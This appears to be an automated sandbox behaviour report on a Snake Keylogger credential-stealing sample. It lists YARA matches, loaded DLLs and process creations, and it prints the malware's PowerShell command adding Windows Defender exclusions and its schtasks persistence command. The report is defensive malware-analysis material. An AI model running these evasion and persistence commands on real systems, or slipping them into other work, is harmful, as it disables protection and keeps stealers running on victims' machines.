                  Source: 2.2.7495 P.exe.47d0650.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 2.2.7495 P.exe.478c830.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.7495 P.exe.478c830.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: 7495 P.exe PID: 5272, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: 7495 P.exe PID: 8812, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: HRrXXnBIpL.exe PID: 8888, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 7495 P.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: HRrXXnBIpL.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 2.2.7495 P.exe.478c830.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 2.2.7495 P.exe.478c830.1.raw.unpack, J.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 2.2.7495 P.exe.478c830.1.raw.unpack, J.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 2.2.7495 P.exe.47d0650.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 2.2.7495 P.exe.47d0650.2.raw.unpack, J.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 2.2.7495 P.exe.47d0650.2.raw.unpack, J.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, aMu2NOYwqVRQXxSL3P.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, aMu2NOYwqVRQXxSL3P.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, EYXaffSSoNkmQUFZXO.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, EYXaffSSoNkmQUFZXO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, EYXaffSSoNkmQUFZXO.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/15@4/4
                  Source: C:\Users\user\Desktop\7495 P.exeFile created: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeMutant created: \Sessions\1\BaseNamedObjects\tNIdRWNgGDwLnbxDBfODao
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8560:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8656:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9052:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8436:120:WilError_03
                  Source: C:\Users\user\Desktop\7495 P.exeFile created: C:\Users\user\AppData\Local\Temp\tmp843E.tmpJump to behavior
                  Source: 7495 P.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 7495 P.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\7495 P.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: 7495 P.exe, 0000000D.00000002.3730302031.0000000003545000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.0000000003512000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.0000000003552000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.0000000003520000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.0000000003502000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.000000000338E000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000033D2000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.000000000339E000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000033AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: 7495 P.exeVirustotal: Detection: 43%
                  Source: 7495 P.exeReversingLabs: Detection: 44%
                  Source: C:\Users\user\Desktop\7495 P.exeFile read: C:\Users\user\Desktop\7495 P.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\7495 P.exe "C:\Users\user\Desktop\7495 P.exe"
                  Source: C:\Users\user\Desktop\7495 P.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\7495 P.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\7495 P.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp843E.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\7495 P.exeProcess created: C:\Users\user\Desktop\7495 P.exe "C:\Users\user\Desktop\7495 P.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp946B.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess created: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe "C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe"
                  Source: C:\Users\user\Desktop\7495 P.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp843E.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess created: C:\Users\user\Desktop\7495 P.exe "C:\Users\user\Desktop\7495 P.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp946B.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess created: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe "C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: iconcodecservice.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
